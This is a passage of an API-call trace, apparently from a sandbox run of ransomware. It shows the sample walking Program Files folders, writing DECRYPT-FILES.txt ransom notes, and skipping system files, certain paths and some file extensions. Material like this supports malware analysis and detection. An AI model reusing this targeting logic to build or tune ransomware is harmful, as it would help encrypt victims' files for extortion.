dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.701] lstrlenW (lpString="C:\\Program Files\\Microsoft SQL Server Compact Edition\\") returned 54 [0179.701] lstrcatW (in: lpString1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", lpString2="*" | out: lpString1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\*") returned="C:\\Program Files\\Microsoft SQL Server Compact Edition\\*" [0179.701] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\*", lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xa6cb4540, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6cb4540, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479838 [0179.701] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.701] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xa6cb4540, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6cb4540, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.701] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.701] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.701] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6c8e3e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6c8e3e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c8e3e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0179.701] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0179.701] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95f8cc20, ftCreationTime.dwHighDateTime=0x1d57425, ftLastAccessTime.dwLowDateTime=0x18c85080, ftLastAccessTime.dwHighDateTime=0x1d50f7c, ftLastWriteTime.dwLowDateTime=0x18c85080, ftLastWriteTime.dwHighDateTime=0x1d50f7c, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x0, dwReserved1=0x0, cFileName="pspbouquetcontrary.exe", cAlternateFileName="PSPBOU~1.EXE")) returned 1 [0179.702] lstrcmpiW (lpString1="pspbouquetcontrary.exe", lpString2="DECRYPT-FILES.txt") returned 1 [0179.702] lstrcmpiW (lpString1="pspbouquetcontrary.exe", lpString2="autorun.inf") returned 1 [0179.702] lstrcmpiW (lpString1="pspbouquetcontrary.exe", lpString2="boot.ini") returned 1 [0179.702] lstrcmpiW (lpString1="pspbouquetcontrary.exe", lpString2="desktop.ini") returned 1 [0179.702] lstrcmpiW (lpString1="pspbouquetcontrary.exe", lpString2="ntuser.dat") returned 1 [0179.702] lstrcmpiW (lpString1="pspbouquetcontrary.exe", lpString2="iconcache.db") returned 1 [0179.702] lstrcmpiW (lpString1="pspbouquetcontrary.exe", lpString2="bootsect.bak") returned 1 [0179.702] lstrcmpiW (lpString1="pspbouquetcontrary.exe", lpString2="ntuser.dat.log") returned 1 [0179.702] lstrcmpiW (lpString1="pspbouquetcontrary.exe", lpString2="thumbs.db") returned -1 [0179.702] lstrcmpiW (lpString1="pspbouquetcontrary.exe", lpString2="Bootfont.bin") returned 1 [0179.702] lstrlenW (lpString="pspbouquetcontrary.exe") returned 22 [0179.702] lstrcmpiW (lpString1="exe", lpString2="lnk") returned -1 [0179.702] lstrcmpiW (lpString1="exe", lpString2="exe") returned 0 [0179.702] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xa6c8e3e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c8e3e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v3.5", cAlternateFileName="")) returned 1 [0179.702] lstrcmpW (lpString1="v3.5", lpString2=".") returned 1 [0179.702] lstrcmpW (lpString1="v3.5", lpString2="..") returned 1 [0179.702] lstrcatW (in: lpString1="v3.5", lpString2="\\" | out: lpString1="v3.5\\") returned="v3.5\\" [0179.702] lstrcatW (in: lpString1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", lpString2="v3.5\\" | out: lpString1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\") returned="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\" [0179.702] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", lpSrch="SQL") returned="SQL Server Compact Edition\\v3.5\\" [0179.702] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", lpSrch="\\Program Files") returned="\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\" [0179.702] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", lpSrch=":\\Windows") returned 0x0 [0179.702] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", lpSrch="\\Games\\") returned 0x0 [0179.702] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.702] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.702] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.702] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.702] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.702] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", lpSrch="\\All Users") returned 0x0 [0179.702] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.702] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.702] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.702] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", lpSrch="AhnLab") returned 0x0 [0179.702] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.702] lstrlenW (lpString="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\") returned 59 [0179.702] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.702] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\\\0a16c9.tmp") returned 70 [0179.703] CreateFileW (lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\\\0a16c9.tmp" (normalized: "c:\\program files\\microsoft sql server compact edition\\v3.5\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0179.710] GetLastError () returned 0x5 [0179.710] lstrlenW (lpString="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\") returned 59 [0179.710] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.710] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\\\DECRYPT-FILES.txt") returned 77 [0179.710] CreateFileW (lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\\\DECRYPT-FILES.txt" (normalized: "c:\\program files\\microsoft sql server compact edition\\v3.5\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.712] lstrlenW (lpString="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\") returned 59 [0179.712] lstrcatW (in: lpString1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", lpString2="*" | out: lpString1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*") returned="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*" [0179.712] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xa6c8e3e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c8e3e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479878 [0179.713] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.713] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xa6c8e3e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c8e3e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.713] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.713] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.713] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6c8e3e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6c8e3e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c8e3e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0179.713] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0179.713] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xa6c8e3e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c8e3e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0179.713] lstrcmpW (lpString1="Desktop", lpString2=".") returned 1 [0179.713] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1 [0179.713] lstrcatW (in: lpString1="Desktop", lpString2="\\" | out: lpString1="Desktop\\") returned="Desktop\\" [0179.713] lstrcatW (in: lpString1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", lpString2="Desktop\\" | out: lpString1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\") returned="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\" [0179.713] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", lpSrch="SQL") returned="SQL Server Compact Edition\\v3.5\\Desktop\\" [0179.713] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", lpSrch="\\Program Files") returned="\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\" [0179.713] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", lpSrch=":\\Windows") returned 0x0 [0179.713] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", lpSrch="\\Games\\") returned 0x0 [0179.713] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.713] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.714] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.714] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.714] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.714] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", lpSrch="\\All Users") returned 0x0 [0179.714] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.714] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.714] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.714] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", lpSrch="AhnLab") returned 0x0 [0179.714] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.714] lstrlenW (lpString="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\") returned 67 [0179.714] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.714] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\\\0a16c9.tmp") returned 78 [0179.714] CreateFileW (lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\\\0a16c9.tmp" (normalized: "c:\\program files\\microsoft sql server compact edition\\v3.5\\desktop\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0179.714] GetLastError () returned 0x5 [0179.714] lstrlenW (lpString="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\") returned 67 [0179.714] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.714] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\\\DECRYPT-FILES.txt") returned 85 [0179.714] CreateFileW (lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\\\DECRYPT-FILES.txt" (normalized: "c:\\program files\\microsoft sql server compact edition\\v3.5\\desktop\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.714] lstrlenW (lpString="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\") returned 67 [0179.714] lstrcatW (in: lpString1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", lpString2="*" | out: lpString1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\*") returned="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\*" [0179.714] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\*", lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xa6c8e3e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c8e3e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798b8 [0179.715] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.715] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xa6c8e3e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c8e3e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.715] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.715] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.715] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6c8e3e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6c8e3e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c8e3e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0179.715] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0179.715] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6c8e3e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6c8e3e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c8e3e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0179.715] FindClose (in: hFindFile=0x4798b8 | out: hFindFile=0x4798b8) returned 1 [0179.715] CloseHandle (hObject=0xffffffff) returned 0 [0179.715] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd805600, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x5ab6f770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x8b840, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlceca35.dll", cAlternateFileName="SQLCEC~1.DLL")) returned 1 [0179.715] lstrcmpiW (lpString1="sqlceca35.dll", lpString2="DECRYPT-FILES.txt") returned 1 [0179.715] lstrcmpiW (lpString1="sqlceca35.dll", lpString2="autorun.inf") returned 1 [0179.715] lstrcmpiW (lpString1="sqlceca35.dll", lpString2="boot.ini") returned 1 [0179.715] lstrcmpiW (lpString1="sqlceca35.dll", lpString2="desktop.ini") returned 1 [0179.715] lstrcmpiW (lpString1="sqlceca35.dll", lpString2="ntuser.dat") returned 1 [0179.715] lstrcmpiW (lpString1="sqlceca35.dll", lpString2="iconcache.db") returned 1 [0179.715] lstrcmpiW (lpString1="sqlceca35.dll", lpString2="bootsect.bak") returned 1 [0179.715] lstrcmpiW (lpString1="sqlceca35.dll", lpString2="ntuser.dat.log") returned 1 [0179.715] lstrcmpiW (lpString1="sqlceca35.dll", lpString2="thumbs.db") returned -1 [0179.715] lstrcmpiW (lpString1="sqlceca35.dll", lpString2="Bootfont.bin") returned 1 [0179.715] lstrlenW (lpString="sqlceca35.dll") returned 13 [0179.715] lstrcmpiW (lpString1="dll", lpString2="lnk") returned -1 [0179.715] lstrcmpiW (lpString1="dll", lpString2="exe") returned -1 [0179.715] lstrcmpiW (lpString1="dll", lpString2="sys") returned -1 [0179.715] lstrcmpiW (lpString1="dll", lpString2="dll") returned 0 [0179.715] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd805600, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x1d040, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlcecompact35.dll", cAlternateFileName="SQLCEC~2.DLL")) returned 1 [0179.715] lstrcmpiW (lpString1="sqlcecompact35.dll", lpString2="DECRYPT-FILES.txt") returned 1 [0179.715] lstrcmpiW (lpString1="sqlcecompact35.dll", lpString2="autorun.inf") returned 1 [0179.715] lstrcmpiW (lpString1="sqlcecompact35.dll", lpString2="boot.ini") returned 1 [0179.715] lstrcmpiW (lpString1="sqlcecompact35.dll", lpString2="desktop.ini") returned 1 [0179.715] lstrcmpiW (lpString1="sqlcecompact35.dll", lpString2="ntuser.dat") returned 1 [0179.715] lstrcmpiW (lpString1="sqlcecompact35.dll", lpString2="iconcache.db") returned 1 [0179.716] lstrcmpiW (lpString1="sqlcecompact35.dll", lpString2="bootsect.bak") returned 1 [0179.716] lstrcmpiW (lpString1="sqlcecompact35.dll", lpString2="ntuser.dat.log") returned 1 [0179.716] lstrcmpiW (lpString1="sqlcecompact35.dll", lpString2="thumbs.db") returned -1 [0179.716] lstrcmpiW (lpString1="sqlcecompact35.dll", lpString2="Bootfont.bin") returned 1 [0179.716] lstrlenW (lpString="sqlcecompact35.dll") returned 18 [0179.716] lstrcmpiW (lpString1="dll", lpString2="lnk") returned -1 [0179.716] lstrcmpiW (lpString1="dll", lpString2="exe") returned -1 [0179.716] lstrcmpiW (lpString1="dll", lpString2="sys") returned -1 [0179.716] lstrcmpiW (lpString1="dll", lpString2="dll") returned 0 [0179.716] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd805600, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x5ab6f770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x24440, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlceer35EN.dll", cAlternateFileName="SQLCEE~1.DLL")) returned 1 [0179.716] lstrcmpiW (lpString1="sqlceer35EN.dll", lpString2="DECRYPT-FILES.txt") returned 1 [0179.716] lstrcmpiW (lpString1="sqlceer35EN.dll", lpString2="autorun.inf") returned 1 [0179.716] lstrcmpiW (lpString1="sqlceer35EN.dll", lpString2="boot.ini") returned 1 [0179.716] lstrcmpiW (lpString1="sqlceer35EN.dll", lpString2="desktop.ini") returned 1 [0179.716] lstrcmpiW (lpString1="sqlceer35EN.dll", lpString2="ntuser.dat") returned 1 [0179.716] lstrcmpiW (lpString1="sqlceer35EN.dll", lpString2="iconcache.db") returned 1 [0179.716] lstrcmpiW (lpString1="sqlceer35EN.dll", lpString2="bootsect.bak") returned 1 [0179.716] lstrcmpiW (lpString1="sqlceer35EN.dll", lpString2="ntuser.dat.log") returned 1 [0179.716] lstrcmpiW (lpString1="sqlceer35EN.dll", lpString2="thumbs.db") returned -1 [0179.716] lstrcmpiW (lpString1="sqlceer35EN.dll", lpString2="Bootfont.bin") returned 1 [0179.716] lstrlenW (lpString="sqlceer35EN.dll") returned 15 [0179.716] lstrcmpiW (lpString1="dll", lpString2="lnk") returned -1 [0179.716] lstrcmpiW (lpString1="dll", lpString2="exe") returned -1 [0179.716] lstrcmpiW (lpString1="dll", lpString2="sys") returned -1 [0179.716] lstrcmpiW (lpString1="dll", lpString2="dll") returned 0 [0179.716] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd805600, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x5ab958d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x15a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlceme35.dll", cAlternateFileName="SQLCEM~1.DLL")) returned 1 [0179.716] lstrcmpiW (lpString1="sqlceme35.dll", lpString2="DECRYPT-FILES.txt") returned 1 [0179.716] lstrcmpiW (lpString1="sqlceme35.dll", lpString2="autorun.inf") returned 1 [0179.716] lstrcmpiW (lpString1="sqlceme35.dll", lpString2="boot.ini") returned 1 [0179.716] lstrcmpiW (lpString1="sqlceme35.dll", lpString2="desktop.ini") returned 1 [0179.716] lstrcmpiW (lpString1="sqlceme35.dll", lpString2="ntuser.dat") returned 1 [0179.716] lstrcmpiW (lpString1="sqlceme35.dll", lpString2="iconcache.db") returned 1 [0179.716] lstrcmpiW (lpString1="sqlceme35.dll", lpString2="bootsect.bak") returned 1 [0179.716] lstrcmpiW (lpString1="sqlceme35.dll", lpString2="ntuser.dat.log") returned 1 [0179.716] lstrcmpiW (lpString1="sqlceme35.dll", lpString2="thumbs.db") returned -1 [0179.716] lstrcmpiW (lpString1="sqlceme35.dll", lpString2="Bootfont.bin") returned 1 [0179.716] lstrlenW (lpString="sqlceme35.dll") returned 13 [0179.717] lstrcmpiW (lpString1="dll", lpString2="lnk") returned -1 [0179.717] lstrcmpiW (lpString1="dll", lpString2="exe") returned -1 [0179.717] lstrcmpiW (lpString1="dll", lpString2="sys") returned -1 [0179.717] lstrcmpiW (lpString1="dll", lpString2="dll") returned 0 [0179.717] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd805600, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, 